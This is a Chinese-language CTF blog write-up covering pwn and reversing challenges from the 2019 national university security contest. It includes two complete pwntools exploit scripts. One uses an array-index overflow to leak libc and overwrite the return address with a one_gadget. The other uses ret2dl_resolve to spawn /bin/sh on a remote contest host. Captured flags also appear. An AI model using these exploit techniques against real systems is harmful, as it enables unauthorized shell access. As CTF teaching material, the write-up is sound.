<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">





  <link rel="alternate" href="/atom.xml" title="R4bb1t的ctf博客" type="application/atom+xml">






<meta name="description" content="pwnyour_pwn先check 一下，发现保护全开，还是有点慌的  进入到IDA审计代码">
<meta property="og:type" content="article">
<meta property="og:title" content="2019全国大学生信息安全大赛部分Wp">
<meta property="og:url" content="http://yoursite.com/2020/06/21/2019全国大学生信息安全大赛/index.html">
<meta property="og:site_name" content="R4bb1t的ctf博客">
<meta property="og:description" content="pwnyour_pwn先check 一下，发现保护全开，还是有点慌的  进入到IDA审计代码">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://yoursite.com/images/2019全国大学生信息安全大赛/1.png">
<meta property="og:image" content="http://yoursite.com/images/2019全国大学生信息安全大赛/2.jpg">
<meta property="og:image" content="http://yoursite.com/images/2019全国大学生信息安全大赛/3.jpg">
<meta property="og:image" content="http://yoursite.com/images/2019全国大学生信息安全大赛/4.jpg">
<meta property="og:image" content="http://yoursite.com/images/2019全国大学生信息安全大赛/5.jpg">
<meta property="og:image" content="http://yoursite.com/images/2019全国大学生信息安全大赛/6.jpg">
<meta property="og:image" content="http://yoursite.com/images/2019全国大学生信息安全大赛/7.jpg">
<meta property="og:updated_time" content="2019-05-09T12:15:26.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="2019全国大学生信息安全大赛部分Wp">
<meta name="twitter:description" content="pwnyour_pwn先check 一下，发现保护全开，还是有点慌的  进入到IDA审计代码">
<meta name="twitter:image" content="http://yoursite.com/images/2019全国大学生信息安全大赛/1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2020/06/21/2019全国大学生信息安全大赛/">





  <title>2019全国大学生信息安全大赛部分Wp | R4bb1t的ctf博客</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>
    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">R4bb1t的ctf博客</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/06/21/2019全国大学生信息安全大赛/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="R4bb1t">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/n0va.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="R4bb1t的ctf博客">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">2019全国大学生信息安全大赛部分Wp</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-06-21T15:11:22+08:00">
                2020-06-21
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/2019-iscc/" itemprop="url" rel="index">
                    <span itemprop="name">2019-iscc</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="pwn"><a href="#pwn" class="headerlink" title="pwn"></a>pwn</h2><h3 id="your-pwn"><a href="#your-pwn" class="headerlink" title="your_pwn"></a>your_pwn</h3><p>先check 一下，发现保护全开，还是有点慌的</p>
<p><img src="\images\2019全国大学生信息安全大赛\1.png" alt></p>
<p>进入到IDA审计代码</p>
<p><img src="\images\2019全国大学生信息安全大赛\2.jpg" alt></p>
<a id="more"></a>
<p>在其主要代码里存在下标溢出，很明显地可以进行任意地址读和写（因为对于数组v4的下标v1没有进行任何的限制)，思路其实就出来了，先利用任意地址读泄漏出真实地址，再通过任意地址写将返回地址修改成onegadget</p>
<p>只是这里的读和写处理有点麻烦而已，因为它是单个字节读取和写入的，所以每次都要进行6次操作。</p>
<h4 id="先确定v4-0-的位置"><a href="#先确定v4-0-的位置" class="headerlink" title="先确定v4[0]的位置"></a>先确定v4[0]的位置</h4><p>gdb下断第一次输入v4[0]=100(0x64)单步跟踪找到0x64的位置</p>
<p><img src="\images\2019全国大学生信息安全大赛\3.jpg" alt></p>
<h4 id="确定返回地址和要泄漏的真实地址跟v4-0-的偏移"><a href="#确定返回地址和要泄漏的真实地址跟v4-0-的偏移" class="headerlink" title="确定返回地址和要泄漏的真实地址跟v4[0]的偏移"></a>确定返回地址和要泄漏的真实地址跟v4[0]的偏移</h4><p><img src="\images\2019全国大学生信息安全大赛\4.jpg" alt></p>
<p>这里其实我还算出另一个偏移：就是v1跟v4[0]的偏移，是40，为最后的退出getshell做准备，同样找到v1的位置就可以了，这里我就不截图了。</p>
<h4 id="获得onegadget地址"><a href="#获得onegadget地址" class="headerlink" title="获得onegadget地址"></a>获得onegadget地址</h4><p>找泄漏出真实地址之后 就可以得到偏移，再查看onegadget：one_gadget+libc库</p>
<p><img src="\images\2019全国大学生信息安全大赛\5.jpg" alt></p>
<h4 id="修改返回地址为onegadget"><a href="#修改返回地址为onegadget" class="headerlink" title="修改返回地址为onegadget"></a>修改返回地址为onegadget</h4><p>exp:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"><span class="comment">#内存地址随机化</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">debug</span><span class="params">(addr,PIE=True)</span>:</span></span><br><span class="line">    <span class="keyword">if</span> PIE:</span><br><span class="line">        text_base = int(os.popen(<span class="string">"pmap &#123;&#125;| awk '&#123;&#123;print $1&#125;&#125;'"</span>.format(p.pid)).readlines()[<span class="number">1</span>], <span class="number">16</span>)</span><br><span class="line">        gdb.attach(p,<span class="string">'b *&#123;&#125;'</span>.format(hex(text_base+addr)))</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        gdb.attach(p,<span class="string">"b *&#123;&#125;"</span>.format(hex(addr))) </span><br><span class="line">p = process(<span class="string">'./pwn'</span>)</span><br><span class="line"><span class="comment"># p = remote("1b190bf34e999d7f752a35fa9ee0d911.kr-lab.com","57856")</span></span><br><span class="line">elf = ELF(<span class="string">'./pwn'</span>)</span><br><span class="line">libc = elf.libc</span><br><span class="line"><span class="comment"># print libc</span></span><br><span class="line"><span class="comment"># pause()</span></span><br><span class="line">p.recvuntil(<span class="string">'name:'</span>)</span><br><span class="line">p.sendline(<span class="string">'n0va'</span>)</span><br><span class="line"><span class="comment">#泄漏__libc_start_main+240，每次泄漏一个字节</span></span><br><span class="line">p.recvuntil(<span class="string">'input index\n'</span>)</span><br><span class="line">p.sendline(<span class="string">'632'</span>)</span><br><span class="line">p.recvuntil(<span class="string">'now value(hex) '</span>)</span><br><span class="line">a = int(p.recv(<span class="number">2</span>),<span class="number">16</span>)</span><br><span class="line"><span class="keyword">print</span> hex(a)</span><br><span class="line">p.recvuntil(<span class="string">'input new value\n'</span>)</span><br><span class="line">p.sendline(<span class="string">'1'</span>)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'input index\n'</span>)</span><br><span class="line">p.sendline(<span class="string">'633'</span>)</span><br><span class="line">p.recvuntil(<span class="string">'now value(hex) '</span>)</span><br><span class="line">b = (int(p.recvuntil(<span class="string">'\n'</span>)[:<span class="number">-1</span>],<span class="number">16</span>))&amp;<span class="number">0xff</span></span><br><span class="line"><span class="keyword">print</span> hex(b)</span><br><span class="line">p.recvuntil(<span class="string">'input new value\n'</span>)</span><br><span class="line">p.sendline(<span class="string">'1'</span>)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'input index\n'</span>)</span><br><span class="line">p.sendline(<span class="string">'634'</span>)</span><br><span class="line">p.recvuntil(<span class="string">'now value(hex) '</span>)</span><br><span class="line">c = int(p.recvuntil(<span class="string">'\n'</span>)[:<span class="number">-1</span>],<span class="number">16</span>)&amp;<span class="number">0xff</span></span><br><span class="line"><span class="keyword">print</span> hex(c)</span><br><span class="line">p.recvuntil(<span class="string">'input new value\n'</span>)</span><br><span class="line">p.sendline(<span class="string">'1'</span>)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'input index\n'</span>)</span><br><span class="line">p.sendline(<span class="string">'635'</span>)</span><br><span class="line">p.recvuntil(<span class="string">'now value(hex) '</span>)</span><br><span class="line">d = int(p.recvuntil(<span class="string">'\n'</span>)[:<span class="number">-1</span>],<span class="number">16</span>)&amp;<span class="number">0xff</span></span><br><span class="line"><span class="keyword">print</span> hex(d)</span><br><span class="line">p.recvuntil(<span class="string">'input new value\n'</span>)</span><br><span class="line">p.sendline(<span class="string">'1'</span>)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'input index\n'</span>)</span><br><span class="line">p.sendline(<span class="string">'636'</span>)</span><br><span class="line">p.recvuntil(<span class="string">'now value(hex) '</span>)</span><br><span class="line">e = int(p.recvuntil(<span class="string">'\n'</span>)[:<span class="number">-1</span>],<span class="number">16</span>)&amp;<span class="number">0xff</span></span><br><span class="line"><span class="keyword">print</span> hex(e)</span><br><span class="line">p.recvuntil(<span class="string">'input new value\n'</span>)</span><br><span class="line">p.sendline(<span class="string">'1'</span>)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'input index\n'</span>)</span><br><span class="line">p.sendline(<span class="string">'637'</span>)</span><br><span class="line">p.recvuntil(<span class="string">'now value(hex) '</span>)</span><br><span class="line">f = int(p.recvuntil(<span class="string">'\n'</span>)[:<span class="number">-1</span>],<span class="number">16</span>)&amp;<span class="number">0xff</span></span><br><span class="line"><span class="keyword">print</span> hex(f)</span><br><span class="line">p.recvuntil(<span class="string">'input new value\n'</span>)</span><br><span class="line">p.sendline(<span class="string">'1'</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> hex(a),hex(b),hex(c),hex(d),hex(e),hex(f)</span><br><span class="line">libc_start_main = hex(f)[<span class="number">2</span>:] + hex(e)[<span class="number">2</span>:] + hex(d)[<span class="number">2</span>:] + hex(c)[<span class="number">2</span>:] + hex(b)[<span class="number">2</span>:] + hex(a)[<span class="number">2</span>:]</span><br><span class="line">libc_main = int(libc_start_main,<span class="number">16</span>)<span class="number">-240</span>  <span class="comment">#拼接得到__libc_start_main地址</span></span><br><span class="line"><span class="keyword">print</span> hex(int(libc_start_main,<span class="number">16</span>))</span><br><span class="line"><span class="keyword">print</span> hex(libc_main)</span><br><span class="line">offset = libc_main - libc.symbols[<span class="string">'__libc_start_main'</span>]    <span class="comment">#偏移</span></span><br><span class="line">one_gadget = offset + <span class="number">0x45216</span>   <span class="comment">#onegadget地址</span></span><br><span class="line"><span class="keyword">print</span> <span class="string">"one_gadget--&gt; "</span> + hex(one_gadget)</span><br><span class="line"><span class="comment">#修改返回地址，每次一个字节写入</span></span><br><span class="line">a = one_gadget&amp;<span class="number">0xff</span></span><br><span class="line">b = one_gadget&gt;&gt;<span class="number">8</span>&amp;<span class="number">0xff</span></span><br><span class="line">c = one_gadget&gt;&gt;<span class="number">16</span>&amp;<span class="number">0xff</span></span><br><span class="line">d = one_gadget&gt;&gt;<span class="number">24</span>&amp;<span class="number">0xff</span></span><br><span class="line">e = one_gadget&gt;&gt;<span class="number">32</span>&amp;<span class="number">0xff</span></span><br><span class="line">f = one_gadget&gt;&gt;<span class="number">40</span>&amp;<span class="number">0xff</span></span><br><span class="line"><span class="keyword">print</span> hex(a),hex(b),hex(c),hex(d),hex(e),hex(f)</span><br><span class="line">p.recvuntil(<span class="string">'input index\n'</span>)</span><br><span class="line">p.sendline(<span class="string">'344'</span>)</span><br><span class="line">p.recvuntil(<span class="string">'input new value\n'</span>)</span><br><span class="line">p.sendline(str(a))</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'input index\n'</span>)</span><br><span class="line">p.sendline(<span class="string">'345'</span>)</span><br><span class="line">p.recvuntil(<span class="string">'input new value\n'</span>)</span><br><span class="line">p.sendline(str(b))</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'input index\n'</span>)</span><br><span class="line">p.sendline(<span class="string">'346'</span>)</span><br><span class="line">p.recvuntil(<span class="string">'input new value\n'</span>)</span><br><span class="line">p.sendline(str(c))</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'input index\n'</span>)</span><br><span class="line">p.sendline(<span class="string">'347'</span>)</span><br><span class="line">p.recvuntil(<span class="string">'input new value\n'</span>)</span><br><span class="line">p.sendline(str(d))</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'input index\n'</span>)</span><br><span class="line">p.sendline(<span class="string">'348'</span>)</span><br><span class="line">p.recvuntil(<span class="string">'input new value\n'</span>)</span><br><span class="line">p.sendline(str(e))</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'input index\n'</span>)</span><br><span class="line">p.sendline(<span class="string">'349'</span>)</span><br><span class="line">p.recvuntil(<span class="string">'input new value\n'</span>)</span><br><span class="line">p.sendline(str(f))</span><br><span class="line"><span class="comment">#修改i=40退出 循环</span></span><br><span class="line">p.recvuntil(<span class="string">'input index\n'</span>)</span><br><span class="line">p.sendline(<span class="string">'-4'</span>)</span><br><span class="line">p.sendline(<span class="string">'40'</span>)</span><br><span class="line">p.recvuntil(<span class="string">'do you want continue(yes/no)? \n'</span>)</span><br><span class="line">p.sendline(<span class="string">'no'</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># flag&#123;1ed0e270f57c4e3969415180490fa07e&#125;</span></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h3 id="baby-pwn"><a href="#baby-pwn" class="headerlink" title="baby_pwn"></a>baby_pwn</h3><p>check，只开了NX</p>
<p><img src="\images\2019全国大学生信息安全大赛\6.jpg" alt></p>
<p><img src="\images\2019全国大学生信息安全大赛\7.jpg" alt></p>
<p>程度很简单，一个栈溢出漏洞，没有任何其它可用的函数，程序干净得可怕，其实就很容易想到<a href="https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/advanced-rop/" target="_blank" rel="noopener">runtime_resolve</a>了，直接改脚本</p>
<p>exp:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#-*-coding:utf-8-*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line">context.terminal = [<span class="string">'gnome-terminal'</span>,<span class="string">'-x'</span>,<span class="string">'bash'</span>,<span class="string">'-c'</span>]</span><br><span class="line">context(arch=<span class="string">'amd64'</span>, os=<span class="string">'linux'</span>)</span><br><span class="line"><span class="comment"># p = process('./pwn')</span></span><br><span class="line">p = remote(<span class="string">"da61f2425ce71e72c1ef02104c3bfb69.kr-lab.com"</span>,<span class="string">"33865"</span>)</span><br><span class="line">elf = ELF(<span class="string">'./pwn'</span>)</span><br><span class="line">read_plt = elf.plt[<span class="string">'read'</span>]</span><br><span class="line">alarm_got = elf.got[<span class="string">'alarm'</span>]</span><br><span class="line"><span class="comment"># write_plt = elf.plt['write']</span></span><br><span class="line">bss_addr = elf.bss()</span><br><span class="line">bss_stage1 = <span class="number">0x800</span> + bss_addr</span><br><span class="line">bss_stage2 = <span class="number">80</span> + bss_stage1</span><br><span class="line">ppp_ret = <span class="number">0x080485d9</span></span><br><span class="line">pop_ebp = <span class="number">0x080485db</span></span><br><span class="line">leave_ret = <span class="number">0x08048448</span></span><br><span class="line"><span class="comment">#read(0,bss_addr,100)</span></span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">44</span></span><br><span class="line">payload += p32(read_plt)</span><br><span class="line">payload += p32(ppp_ret)</span><br><span class="line">payload += p32(<span class="number">0</span>)</span><br><span class="line">payload += p32(bss_stage1)</span><br><span class="line">payload += p32(<span class="number">100</span>)</span><br><span class="line">payload += p32(pop_ebp)</span><br><span class="line">payload += p32(bss_stage1)</span><br><span class="line">payload += p32(leave_ret)</span><br><span class="line"><span class="comment"># p.recvuntil('Welcome to XDCTF2015~!\n')</span></span><br><span class="line"><span class="comment"># gdb.attach(p,"b *0x08048546")</span></span><br><span class="line"><span class="comment"># pause()</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line">cmd = <span class="string">'/bin/sh'</span></span><br><span class="line">plt_0 = <span class="number">0x8048380</span></span><br><span class="line">rel_plt = <span class="number">0x804833c</span></span><br><span class="line">index_offset = (bss_stage1+<span class="number">28</span>) - rel_plt</span><br><span class="line"><span class="comment"># write_got = elf.got['write']</span></span><br><span class="line">dynsym = <span class="number">0x080481dc</span>   <span class="comment">#objdump -s -j .dynsym bof</span></span><br><span class="line">dynstr = <span class="number">0x804827c</span>    <span class="comment">#objdump -s -j .dynstr bof</span></span><br><span class="line">fake_sym_addr = bss_stage1+<span class="number">36</span></span><br><span class="line">align = <span class="number">0x10</span> -((fake_sym_addr - dynsym) &amp; <span class="number">0xf</span>)</span><br><span class="line">fake_sym_addr = fake_sym_addr + align</span><br><span class="line">index_dynsym = (fake_sym_addr - dynsym) / <span class="number">0x10</span></span><br><span class="line">r_info = (index_dynsym&lt;&lt;<span class="number">8</span>) | <span class="number">0x7</span></span><br><span class="line">fack_reloc = p32(alarm_got) + p32(r_info)</span><br><span class="line">st_name = (fake_sym_addr + <span class="number">0x10</span>) - dynstr</span><br><span class="line">st_name = (fake_sym_addr + <span class="number">0x10</span>) - dynstr <span class="comment">#加0x10是因为Elf32_Sym的大小为0x10</span></span><br><span class="line">fake_sym = p32(st_name) + p32(<span class="number">0</span>) + p32(<span class="number">0</span>) + p32(<span class="number">0x12</span>)</span><br><span class="line">payload = <span class="string">'aaaa'</span></span><br><span class="line">payload += p32(plt_0)</span><br><span class="line">payload += p32(index_offset)</span><br><span class="line">payload += <span class="string">'aaaa'</span></span><br><span class="line">payload += p32(bss_stage2)</span><br><span class="line">payload += <span class="string">'aaaaaaaa'</span></span><br><span class="line">payload += fack_reloc <span class="comment">#(bss_stage1+28)的位置</span></span><br><span class="line">payload += <span class="string">'b'</span>*align</span><br><span class="line">payload += fake_sym <span class="comment">#(bss_stage1+36)的位置 </span></span><br><span class="line">payload += <span class="string">"system\x00"</span></span><br><span class="line">payload += <span class="string">'a'</span>*(<span class="number">80</span>-len(payload))</span><br><span class="line">payload += cmd + <span class="string">'\x00'</span></span><br><span class="line"><span class="comment"># payload += 'a'*(100-len(payload))</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br><span class="line"><span class="comment"># flag&#123;4b91ebbdb3a0728572005c035aade579&#125;</span></span><br></pre></td></tr></table></figure>
<h2 id="re"><a href="#re" class="headerlink" title="re"></a>re</h2><h3 id="easyGo"><a href="#easyGo" class="headerlink" title="easyGo"></a>easyGo</h3><p>无符号GoLang，贴上网上一篇介绍GoLang逆向的文章，此题就是文章中的demon，flag 都没变，<a href="https://www.jishuwen.com/d/2NaJ" target="_blank" rel="noopener">https://www.jishuwen.com/d/2NaJ</a></p>
<p>再附上一篇无符号Golang程序逆向方法解析<a href="https://www.anquanke.com/post/id/170332" target="_blank" rel="noopener">https://www.anquanke.com/post/id/170332</a></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/06/21/2019上海大学生信息安全竞赛pwn题解/" rel="next" title="2019上海大学生信息安全竞赛pwn题解">
                <i class="fa fa-chevron-left"></i> 2019上海大学生信息安全竞赛pwn题解
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/06/21/2019安恒杯1月月赛/" rel="prev" title="2019安恒杯1月月赛">
                2019安恒杯1月月赛 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/n0va.jpg" alt="R4bb1t">
            
              <p class="site-author-name" itemprop="name">R4bb1t</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">59</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">10</span>
